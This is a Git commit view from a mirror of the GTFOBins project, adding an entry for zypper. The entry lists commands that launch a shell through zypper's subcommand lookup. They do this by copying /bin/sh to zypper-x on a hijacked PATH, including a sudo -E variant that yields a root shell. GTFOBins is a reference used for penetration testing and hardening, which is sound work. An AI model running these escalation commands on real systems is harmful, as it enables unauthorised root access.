mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2024-11-08 07:49:17 +01:00
parent
dd9f4269ed
commit
8c03983ab8
21
_gtfobins/zypper.md
Normal file
21
_gtfobins/zypper.md
Normal file
@ -0,0 +1,21 @@
|
||||
---
|
||||
functions:
|
||||
shell:
|
||||
- description: This requires `/bin/sh` to be copied to `/usr/lib/zypper/commands/zypper-x` and this usually requires elevated privileges.
|
||||
code: |
|
||||
zypper x
|
||||
- code: |
|
||||
TF=$(mktemp -d)
|
||||
cp /bin/sh $TF/zypper-x
|
||||
export PATH=$TF:$PATH
|
||||
zypper x
|
||||
sudo:
|
||||
- description: This requires `/bin/sh` to be copied to `/usr/lib/zypper/commands/zypper-x` and this usually requires elevated privileges.
|
||||
code: |
|
||||
sudo zypper x
|
||||
- code: |
|
||||
TF=$(mktemp -d)
|
||||
cp /bin/sh $TF/zypper-x
|
||||
export PATH=$TF:$PATH
|
||||
sudo -E zypper x
|
||||
---
|
Loading…
Reference in New Issue
Block a user